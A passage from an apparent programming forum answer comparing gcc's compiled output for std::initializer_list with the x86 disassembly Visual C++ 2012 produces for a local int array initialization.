129 .loc 2 98 0
130 0033 4889C7 mov rdi, rax #, D.11805
131 0036 E8000000 call operator delete(void*) #
All in all, std::initializer_list is looking pretty optimal in gcc.
First of all: VC++, as of version VS11=VS2012 in its initial release does not support initializer lists, so the question is a bit moot for VS atm., but as I'm sure they'll patch this up, it should become relevant in a few months (or years).
As additional info, I'll add what VS 2012 does with local array initialization, everybody may draw it's own conclusion as for what that means for when they'll implement initializer lists:
Here's initialization of built-in arrays what VC++2012 spits out in the default release mode of the compiler:
int _tmain(int argc, _TCHAR* argv[])
{
00B91002 in al,dx
00B91003 sub esp,28h
00B91006 mov eax,dword ptr ds:[00B94018h]
00B9100B xor eax,ebp
00B9100D mov dword ptr [ebp-4],eax
00B91010 push esi
int numbers[] = {1,2,3,4,5,6,7,8,9};
00B91011 mov dword ptr [numbers],1
00B91018 mov dword ptr [ebp-24h],2
00B9101F mov dword ptr [ebp-20h],3
00B91026 mov dword ptr [ebp-1Ch],4
00B9102D mov dword ptr [ebp-18h],5
00B91034 mov dword ptr [ebp-14h],6
00B9103B mov dword ptr [ebp-10h],7
00B91042 mov dword ptr [ebp-0Ch],8
00B91049 mov dword ptr [ebp-8],9
...
So this array is created/filled at function execution, no "static" storage involved as such.